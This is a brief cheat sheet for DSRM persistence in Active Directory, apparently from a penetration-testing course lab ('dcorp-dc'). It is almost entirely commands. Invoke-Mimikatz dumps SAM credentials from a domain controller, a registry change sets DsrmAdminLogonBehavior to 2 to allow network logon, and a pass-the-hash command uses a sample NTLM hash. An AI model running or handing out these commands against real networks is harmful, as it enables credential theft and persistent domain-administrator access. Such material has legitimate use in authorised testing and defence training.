Extract Creds From SAM From DC

Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"'

Modify the Register (to be able to login)

New-ItemProperty "HKLM:\\System\\CurrentControlSet\\Control\\Lsa\\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD

Pass The Hash DSRM Administrator

Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dcorp-dc /user:Administrator /ntlm:a102ad5753f4c441e3af31c97fad86fd  /run:powershell.exe"'

Resources

Skeleton Key